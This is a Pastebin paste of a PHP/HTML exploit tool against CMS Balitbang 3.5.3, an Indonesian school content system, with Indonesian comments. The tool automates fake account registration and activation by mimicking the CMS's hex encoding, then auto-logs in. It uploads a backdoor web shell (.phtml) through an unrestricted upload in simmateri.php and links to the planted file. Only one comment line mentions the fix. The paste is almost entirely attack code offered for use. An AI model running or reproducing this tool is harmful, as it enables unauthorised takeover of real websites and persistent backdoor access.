SHARE
TWEET

CMS Balitbang 3.5.3

Xencomt Mar 5th, 2017 (edited) 143 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <html>
  2. <!---
  3. // script ini dibuat berdasarkan iseng saja... :)
  4. // by. DeathCreppy
  5. // --------------------------
  6. // Simpan script ini dengan nama: test.php
  7. // - Jika captcha tidak muncul, buka inspect element, arahin cursor ke captcha, ganti link captcha "/functions/captcha/captcha.php" -> "/functions/spam.php"
  8. // - Jika bypass login gagal, silahkan login manual, kemudian lanjut upload shellnya
  9. // - Format shell: *.phtml,
  10. // --------------------------
  11. // Bugs terletak pada /functons/simmateri.php dan /functions/simmateriguru.php
  12. // Cara menutup bugs ini: gunakan fungsi batasan ekstensi file seperti di /functions/simlapguru.php
  13. // --------------------------
  14. // Tunggu Tutorial selanjutnya "Bypass $_SESSION untuk Lokomedia, Balitbang, F0rmulaCMS".
  15. // --------------------------
  16. -->
  17. <head>
  18. <title>Balitbang 5.3.5 By:DeathCreppy</title>
  19. </head>
  20. <style type="text/css">
  21. input[type=text],input[type=code],input[type=password]{
  22.     border:1px solid #c0c0c0;
  23.     height:24px;
  24.     padding:5px;
  25. }
  26. </style>
  27. <body>
  28. <?php
  29. function hex($str='',$code='') {
  30.   if(($code>=0)and($code<100)) {
  31.     $t .=dechex(strlen($str)+$code)."g";
  32.     $str=strrev($str);
  33.     for($i=0;$i<=strlen($str)-1;$i++) {
  34.       $t .=dechex(ord(substr($str,$i,1))+$code);
  35.     }
  36.   }
  37.   return $t;
  38. }
  39. function unhex($str='',$code='') {
  40.   $all=explode("g",$str);
  41.   $head=hexdec($all[0])-$code;
  42.   $content=$all[1];
  43.   if($head==(strlen($content)/2)) {
  44.     for($i=0;$i<=$head-1;$i++) {
  45.       $t .=chr(hexdec(substr($content,$i*2,2))-$code);
  46.     }
  47.     $t =strrev($t);
  48.   }
  49.   return $t;
  50. }
  51. $target = $_GET['target'];
  52. $ur_target = $target."/member/membersave.php";
  53. $ur_upload = $target."/functions/simmateri.php";
  54. $captcha = $target."/functions/captcha/captcha.php";
  55. $ur_login = $target."/member/ajax_login.php";
  56. $userx = $_GET['n'];
  57. $passx = $_GET['p'];
  58. if(isset($_POST['next'])){
  59.     $tar = $_POST['tar'];
  60.     $n = $_POST['n'];
  61.     $p = $_POST['p'];
  62.     header("Location: test.php?load=daftar&n=".$n."&p=".$p."&target=".$tar."");
  63. }
  64. echo "CSRF Regstration Form + Shell Uploader (Balitbang 3.5.3)<hr>";
  65. ?>
  66. <form method="post" action="" enctype="multipart/form-data">
  67. <table id=tablebaru cellspacing='1' cellpadding='3'>
  68.     <tr>
  69.         <td>target</td>
  70.         <td>:</td>
  71.         <td><input type="text" name="tar" size="61" placeholder='http://'/></td>
  72.     </tr>
  73.     <tr>
  74.         <td>username</td>
  75.         <td>:</td>
  76.         <td><input type="text" name="n" size="61"/></td>
  77.     </tr>
  78.     <tr>
  79.         <td>password</td>
  80.         <td>:</td>
  81.         <td><input type="text" name="p" size="61"/></td>
  82.     </tr>
  83.     <tr>
  84.         <td></td>
  85.         <td></td>
  86.         <td><input type="submit" name="next" value="NEXT &raquo;"/></td>
  87.     </tr>
  88. </table>
  89. </form>
  90. <hr>
  91. <?php if(isset($_GET['load']) && $_GET['load'] == "daftar"){
  92.     $asli = hex($userx,"82");
  93.     $pass = hex($passx,"82");
  94.     echo "username : <b>$userx</b><br>";
  95.     echo "password : <b>$passx</b><hr>";
  96. ?>
  97. <form name='formID' action="<?php echo $ur_target;?>" method='post' target='iframe'>
  98. <input type=hidden name='userid' value='<?php echo hex("simtambah,","82");?>'>
  99. <input type=hidden name='name' value='ganteng'/>
  100. <input type=hidden name='username' value='<?php echo $userx;?>'/>
  101. <input type=hidden name='password' value='<?php echo $passx;?>'/>
  102. <input type=hidden name='email' value='abc@abc.abc'/>
  103. <input type=hidden name='kelamin' value='m'/>
  104. <input type=hidden name='jenis' value='Tamu'>
  105. <input type=hidden name='kelas' value=''/>
  106. <input type=hidden name='hari' value='01'/>
  107. <input type=hidden name='bulan' value='01'/>
  108. <input type=hidden name='tahun' value='1995'/>
  109. <input type=hidden name='nis' value=''/>
  110. <input type=hidden name='pertanyaan' value='1'/>
  111. <input type=hidden name='jawaban' value='1'/>
  112. <input type=hidden name='kerja' value='Guru'/>
  113. <input type=hidden name='alamat' value='jauh'/>
  114. <input type=hidden name='sekolah' value='terserah'/>
  115. <input type=hidden name='telp' value='0'/>
  116. <input type=hidden name='blog' value=''/>
  117. <input type=hidden name='tentang' value='terserah'/>
  118. <input type=hidden name='country' value='INDONESIA'/>
  119. <input type=hidden name='stprofil' value='open'/>
  120. <input type=hidden name='stblog' value='on'/>
  121. <table>
  122.     <tr>
  123.         <td colspan="2" valign="top"><img src='<?php echo $captcha;?>' width='162' height="85"></td>
  124.         <td rowspan="2" valign="top"><i>&raquo; capture target...</i><br><iframe name='iframe' width='310' height='90' style="border:1px solid #c0c0c0;"></iframe></td>
  125.     </tr>
  126.     <tr>
  127.         <td valign="top"><input type='text' name='code' size='12' placeholder="captcha"/></td>
  128.         <td valign="top"><input type=submit name='submit' value='GO &raquo;'/></td>
  129.     </tr>
  130. </table>
  131. </form>
  132. <?php
  133. echo "<!--
  134. ini kode registrasinya: valid/index.php?id=".$asli."&p=".$pass."
  135. -->
  136. ";
  137. echo "Langkah selanjutnya:<br>1. Setelah registrasi berhasil, <input type='button' value='Eue Disini Mastah' onclick=\"verif.location.href='".$target."/valid/index.php?id=".$asli."&p=".$pass."'\"/> untuk aktivasi/verifikasi!.
  138. <br><i>&raquo; capture target...</i><br><iframe name='verif' width='480' height='90' style='border:1px solid #c0c0c0;'></iframe><br>2. Langkah terakhir, Upload backdoornya coxxx<input type='button' onclick=\"window.location.href='test.php?load=upload&n=".$userx."&p=".$passx."&target=".$target."'\" value='Coli Disini :v'/><hr>";
  139. } else if(isset($_GET['load']) && $_GET['load'] == "upload"){
  140. ?>
  141. <script type="text/javascript">
  142. window.onload = function(){
  143.   document.forms['login_form'].submit()
  144.  
  145. }
  146. function setURL(url){
  147.     document.getElementById('verif').src = url;
  148. }
  149. </script>
  150. <form method="post" action="<?php echo $ur_login;?>" target='autologin' name='login_form'>
  151.     <input type='hidden' name='user_name' value="<?php echo $userx;?>"/>
  152.     <input type='hidden' name='password' value="<?php echo $passx;?>"/>
  153.     Jika tidak bisa login dihalaman member, <input type='submit' name='submit' value='Klik disini untuk bikin SESSION'/>
  154. </form>
  155. <div style='margin-top:-20px;'>
  156. <iframe name='autologin' width='30' height='30' style="border:0;"></iframe>
  157. </div>
  158. <form action='<?php echo $ur_upload;?>' method='post' enctype="multipart/form-data" target='golink'>
  159. <input type='hidden' name='pesan' value='abcabcabc'/></td>
  160. <table cellspacing='1' cellpadding='3'>
  161.     <tr>
  162.         <td valign='top'>File</td>
  163.         <td valign='top'>:</td>
  164.         <td valign='top'><input type='file' name='file'></td>
  165.         <td valign='top' align='right'><input type='submit' value=' Crot :v !!'/></td>
  166.     </tr>
  167.     <tr>
  168.         <td valign='top' colspan="4"><i>&raquo; capture target...</i><br><iframe name='golink' width='475' height='150' style="border:1px solid #c0c0c0;"></iframe></td>
  169.     </tr>
  170.     <tr>
  171.         <td valign='top' colspan="4">
  172.         hasil upload (.phtml): <a href="<?php echo $target."/tugas/tgs-ganteng.phtml";?>" target="_blank"><?php echo $target."/tugas/tgs-ganteng.phtml";?></a></td>
  173.     </tr>
  174. </table>
  175. <input type=hidden name='st' value='ganteng'>
  176. <input type=hidden name='nis' value=''>
  177. <input type=hidden name='idtugas' value=''>
  178. </form>
  179. <hr>
  180. <?php } ?>
  181. </body>
  182. </html>
RAW Paste Data
Pastebin PRO Autumn Special!
Get 40% OFF on Pastebin PRO accounts!
Top